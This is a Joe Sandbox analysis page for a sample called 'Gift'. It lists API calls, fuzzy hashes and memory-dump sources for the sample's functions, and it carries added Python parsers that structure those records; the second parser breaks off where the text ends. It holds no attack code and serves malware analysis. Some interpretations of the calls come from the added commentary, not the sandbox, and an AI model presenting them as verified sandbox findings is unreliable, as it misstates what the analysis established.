                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                          • String ID:
                                                                          • API String ID: 1396898556-0
                                                                          • Opcode ID: a67123a0990f1f45fd5b4e49d2a181b817a9be837e4f710892d984fefdd99dec
                                                                          • Instruction ID: d8d71bcefc2d6ad2e4634cc1ced552bd81025a1a5e91cc79b457e9fbc80de225
                                                                          • Opcode Fuzzy Hash: a67123a0990f1f45fd5b4e49d2a181b817a9be837e4f710892d984fefdd99dec
                                                                          • Instruction Fuzzy Hash: 47112B316E0205ABCB15FF71CC26FAE73A99F40711F50843DF945A6281EF708A20AF54
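                                                                          The API records in these entries (`LoadLibraryExW.KERNEL32(?,00000000,00000002,...)`, `Shell_NotifyIconW.SHELL32(00000002,?)`, `GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000)` and the indented `Part of subcall function` lines) all share one layout. The Python parser below is an added example, not part of the Joe Sandbox report or its IDA plugin. It turns the records quoted from this page into structured calls, separates a function's own calls from those the analyzer attributes to it through its callees, trims the argument slots printed beyond the Win32 prototype's parameter count (the arity table is an assumption about how the listing is produced; everything past the documented parameters is stack content, not an argument), and decodes the documented constants: `dwFlags` 2 is `LOAD_LIBRARY_AS_DATAFILE`, `dwMessage` 2 is `NIM_DELETE`, and `0x7FFF` is the maximum environment-variable length.

```python
"""Parse Joe Sandbox 'APIs' call records (IDA plugin listing) into structured data.

Added example; not part of the Joe Sandbox report. The constant tables are the
documented Win32 values. ARITY is an assumption used to drop the extra stack slots
the listing prints after the real parameters of a known prototype.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Records copied from the report entries above (bullets and indentation as extracted).
SAMPLE_LINES = """
  • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
• __lock_file.LIBCMT ref: 002F560B
• __fclose_nolock.LIBCMT ref: 002F5616
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 002E5B1F
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002E27AF,?,00000001), ref: 002E49F4
  • Part of subcall function 002E4B29: FreeLibrary.KERNEL32(00000000,?), ref: 002E4B63
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00344998
"""

_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@$]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented parameter counts (assumption: slots beyond these are stack noise, not arguments).
ARITY = {"LoadLibraryExW": 3, "FreeLibrary": 1, "Shell_NotifyIconW": 2, "GetEnvironmentVariableW": 3}

LOAD_LIBRARY_FLAGS = {
    0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
    0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR", 0x200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x400: "LOAD_LIBRARY_SEARCH_USER_DIRS", 0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}
NIM_MESSAGES = {0: "NIM_ADD", 1: "NIM_MODIFY", 2: "NIM_DELETE", 3: "NIM_SETFOCUS", 4: "NIM_SETVERSION"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                    # call-site address inside the dumped image
    args: list                  # int for a recovered value, None for '?'
    subcall_of: Optional[int]   # callee address when the analyzer inherited the call
    notes: list = field(default_factory=list)


def _decode(call):
    """Annotate parameters whose meaning is fixed by the documented Win32 prototype."""
    a = call.args
    if call.name == "LoadLibraryExW" and len(a) >= 3 and a[2] is not None:
        names = [n for bit, n in LOAD_LIBRARY_FLAGS.items() if a[2] & bit] or ["0"]
        call.notes.append("dwFlags=" + "|".join(names))
    elif call.name == "Shell_NotifyIconW" and a and a[0] is not None:
        call.notes.append("dwMessage=" + NIM_MESSAGES.get(a[0], hex(a[0])))
    elif call.name == "GetEnvironmentVariableW" and len(a) >= 3 and a[2] is not None:
        call.notes.append(f"nSize={a[2]}" + (" (max env var length)" if a[2] == 0x7FFF else ""))


def parse_api_lines(text):
    """Return one ApiCall per record; lines that do not match the layout are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = [x.strip() for x in (m["args"] or "").split(",") if x.strip()]
        args = [None if x == "?" else int(x, 16) for x in raw]
        call = ApiCall(m["name"], m["module"], int(m["ref"], 16),
                       args[: ARITY.get(m["name"], len(args))],
                       int(m["sub"], 16) if m["sub"] else None)
        _decode(call)
        calls.append(call)
    return calls


def direct_calls(calls):
    """Only the calls made by the function itself, not those inherited from callees."""
    return [c for c in calls if c.subcall_of is None]


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_LINES):
        via = f"(via {c.subcall_of:08X}) " if c.subcall_of is not None else ""
        print(f"{c.ref:08X} {via}{c.module}!{c.name} {c.args} {' '.join(c.notes)}")
```

`LOAD_LIBRARY_AS_DATAFILE` maps the file as data without running its entry point, which is how a module's resources or strings are read; paired with the `FreeLibrary` subcalls in the same entry it reads as a load-read-unload helper rather than code execution. Filter with `direct_calls` when attributing imports to a function, since the analyzer lists callee APIs under every caller.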
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 913aa5ad15723e0e23089c2103ac2053663674067e590e7437a5a4b8f98ff748
                                                                          • Instruction ID: 5da2f850dd7b546c98c7b957fb88e26e24a7b96a5e4cfe5829f6388520be0378
                                                                          • Opcode Fuzzy Hash: 913aa5ad15723e0e23089c2103ac2053663674067e590e7437a5a4b8f98ff748
                                                                          • Instruction Fuzzy Hash: CA116A76254605DFC724CF29D481926F7E9FF48354760883EE88ACB261EB32E861CF40
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 81150db8cc8cdbada3a0d659bac9d4ad1dbd0f261464f01a3f5d4139dcf7b451
                                                                          • Instruction ID: 2592cfa4b398f5c5ac9283710f2b36ffe433f7143dca228c411dd3d8c7688d79
                                                                          • Opcode Fuzzy Hash: 81150db8cc8cdbada3a0d659bac9d4ad1dbd0f261464f01a3f5d4139dcf7b451
                                                                          • Instruction Fuzzy Hash: F2212EB4628352DFCB25CF14C458B1ABBE4BF84304F05896DE88A57362C731EC69CB92
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 38c2a17dcf10df27e90b63f8c3c2b279d922f29058a572b75a1f29e5e0f7ec9f
                                                                          • Instruction ID: 732229fce516c9cd0d8699ce5e27608be56eb9fd8684371c10813bad10a73e32
                                                                          • Opcode Fuzzy Hash: 38c2a17dcf10df27e90b63f8c3c2b279d922f29058a572b75a1f29e5e0f7ec9f
                                                                          • Instruction Fuzzy Hash: 0801F7722617056EC7205F39D802A77B7949B447D0F508539F61ACA2D1DA71E4608B50
                                                                          APIs
                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00344998
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentVariable
                                                                          • String ID:
                                                                          • API String ID: 1431749950-0
                                                                          • Opcode ID: 3ed187d344ea3c1a663fe9522e28f6228f5bdc4d7834a49323dc3fed74c84252
                                                                          • Instruction ID: 68c69a40dac75630d88d11f12932360fe26b06dc077c0a1b0caa19e07dd43f9c
                                                                          • Opcode Fuzzy Hash: 3ed187d344ea3c1a663fe9522e28f6228f5bdc4d7834a49323dc3fed74c84252
                                                                          • Instruction Fuzzy Hash: C0F01D36618148AFCB15FB65D84ACAF77BCEF45360B40405AF9089B351DE70AD518B50
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • _memset.LIBCMT ref: 00337CB4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 525207782-0
                                                                          • Opcode ID: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
                                                                          • Instruction ID: 76998dc675ae0d913000eb34a93384706fc42544d06fe9b25448cfab06768763
                                                                          • Opcode Fuzzy Hash: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
                                                                          • Instruction Fuzzy Hash: 9301F6742042049FD325EF5CD581F15BBE5AF59350F24846AF6888B392DB72E810CF90
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • _memmove.LIBCMT ref: 0030DC8B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1602317333-0
                                                                          • Opcode ID: ae9eabddbf4a68bfc84dab50d204ff83bc6aaafdc3dc9210237590f058b6849d
                                                                          • Instruction ID: 0124261f7df78fbe28345c93267ac22491895ac7e234afc6aeeaf8181f262120
                                                                          • Opcode Fuzzy Hash: ae9eabddbf4a68bfc84dab50d204ff83bc6aaafdc3dc9210237590f058b6849d
                                                                          • Instruction Fuzzy Hash: A3F01274614105DFD711DF68C581E25BBE1BF1A340B24846DE6898B392EB73D821CF91
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _fseek
                                                                          • String ID:
                                                                          • API String ID: 2937370855-0
                                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                          • Instruction ID: ffd4922a0e5d5561738f3296a0e464606ed920219c569c0827559566aa612faa
                                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                          • Instruction Fuzzy Hash: 3AF08CB6410208BFDF159F45DC00CEBBB79EB85320F0041A8F9045A211D272EA219BA0
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,?,?,002E27AF,?,00000001), ref: 002E4A63
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          • Opcode ID: a9c3403e75ace17b3d0be7da88e66fd8bb80dd34733fda08a74f6a977a701cee
                                                                          • Instruction ID: b7a84759fac18d02932a22c2e3f30c0f6f803f2bd329a74faae53ecdab0928e1
                                                                          • Opcode Fuzzy Hash: a9c3403e75ace17b3d0be7da88e66fd8bb80dd34733fda08a74f6a977a701cee
                                                                          • Instruction Fuzzy Hash: C2F085711A0752CFCB34AF26E4A0826BBF0AF043263A0893EE6D783710C37199A0CF04
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 06fc47855e83f6d9ed195d9aa6ffba673d15fc94ed66c3bbafef9c30f14fad95
                                                                          • Instruction ID: 0a5737d1f9808c7ccfc03370fc9225aeeeb471d3e7e62ae7d88f3b04559741fa
                                                                          • Opcode Fuzzy Hash: 06fc47855e83f6d9ed195d9aa6ffba673d15fc94ed66c3bbafef9c30f14fad95
                                                                          • Instruction Fuzzy Hash: FCE0E5716182469AE73AAB689404762FBD8AB04310F10442AD49581741E7F59CE49BA2
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                          • Instruction ID: 2605d4a2764c0a2e293e33bb4adc45b2fd6baa81576ea888bbf82538fd648cde
                                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                          • Instruction Fuzzy Hash: D4F0587240020DFFDF05CF80C941EAABB79FF04314F208189F9198A212D332DA61AB90
                                                                          APIs
                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002F09E4
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LongNamePath_memmove
                                                                          • String ID:
                                                                          • API String ID: 2514874351-0
                                                                          • Opcode ID: 9c7f21a87ca6eb2b8e9fdc88ee42a7f87315163fd37749be00a726c37d86c5ce
                                                                          • Instruction ID: b7ef89b77f5a8a9dfb596ebb609b1731c9e8136a2eaa20fb6fd68ac95283e46a
                                                                          • Opcode Fuzzy Hash: 9c7f21a87ca6eb2b8e9fdc88ee42a7f87315163fd37749be00a726c37d86c5ce
                                                                          • Instruction Fuzzy Hash: C5E0863690012857C721E6989C16FEA77DDDB89791F0441B6FC0CD7344DA609C918691
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 3aab31029552edf9b1f171cb197b285aaceac6f383754b4e5d52989b6f5e596f
                                                                          • Instruction ID: 8d2ffbae8595d41d367ed18f2bcd77d3c15000da2236d649c7c09c9196f6ac96
                                                                          • Opcode Fuzzy Hash: 3aab31029552edf9b1f171cb197b285aaceac6f383754b4e5d52989b6f5e596f
                                                                          • Instruction Fuzzy Hash: E2B09238000700579D2A1F3C198909A334558433A9FDE1B81E478854E29279A84BA520
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction ID: b9e97823afca8564ff51108c8146ee898e130a540ccd03d76c03fd75020ea4f1
                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction Fuzzy Hash: 73B0927644020C77CE012E82EC03A697F29AB406A8F408020FB0C1C162A673E6B09A89
                                                                          APIs
                                                                            • Part of subcall function 00334005: FindFirstFileW.KERNEL32(?,?), ref: 0033407C
                                                                            • Part of subcall function 00334005: DeleteFileW.KERNEL32(?,?,?,?), ref: 003340CC
                                                                            • Part of subcall function 00334005: FindNextFileW.KERNEL32(00000000,00000010), ref: 003340DD
                                                                            • Part of subcall function 00334005: FindClose.KERNEL32(00000000), ref: 003340F4
                                                                          • GetLastError.KERNEL32 ref: 0033C292
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                          • String ID:
                                                                          • API String ID: 2191629493-0
                                                                          • Opcode ID: 0f1fc5ff3e439e90906c85e2aba2e6c32288f5b7b08488d98a547af709f39831
                                                                          • Instruction ID: fbd05c1139cdaa5b95b3158712f26df5e3dd55582a0b545c557252dc32d82d89
                                                                          • Opcode Fuzzy Hash: 0f1fc5ff3e439e90906c85e2aba2e6c32288f5b7b08488d98a547af709f39831
                                                                          • Instruction Fuzzy Hash: 90F08C322206108FCB15EF99D885B6AB7E9AF88320F05845AF9499B352CB74BC11CB94
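Each record above lists the Win32 and CRT calls Joe Sandbox resolved for one function of the dumped module. A line prefixed "Part of subcall function <addr>:" means the call is reached through that helper rather than issued by the function itself, and "API ID" is the sorted token signature of the whole call set. The record attributed to subcall function 00334005 combines FindFirstFileW, DeleteFileW, FindNextFileW and FindClose, the enumerate-and-delete loop that clears a directory's contents. The Python parser below is added here as an illustration; it is not part of the Joe Sandbox report or its tooling. It turns records of this shape into structured call lists, merges direct and subcall names, and flags that combination. Its input is constructed from three records on this page with the repeated Associated-dump lines removed; the field names it keys on (APIs, API ID, Opcode ID, Source File) are the ones the listing uses, while the regular expressions are an assumption about the line format, checked only against the shapes present here.

```python
"""Parse Joe Sandbox per-function records into Win32 call lists and flag enumerate-and-delete."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three records copied from the report listing, with the
# repeated '• Associated:' dump lines removed (the parser ignores them anyway).
SAMPLE_REPORT = """\
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00344998
• Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
Similarity
• API ID: EnvironmentVariable
• String ID:
• Opcode ID: 3ed187d344ea3c1a663fe9522e28f6228f5bdc4d7834a49323dc3fed74c84252
APIs
  • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
  • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
• _memset.LIBCMT ref: 00337CB4
Similarity
• API ID: Exception@8Throw_memsetstd::exception::exception
• Opcode ID: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
APIs
  • Part of subcall function 00334005: FindFirstFileW.KERNEL32(?,?), ref: 0033407C
  • Part of subcall function 00334005: DeleteFileW.KERNEL32(?,?,?,?), ref: 003340CC
  • Part of subcall function 00334005: FindNextFileW.KERNEL32(00000000,00000010), ref: 003340DD
  • Part of subcall function 00334005: FindClose.KERNEL32(00000000), ref: 003340F4
• GetLastError.KERNEL32 ref: 0033C292
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
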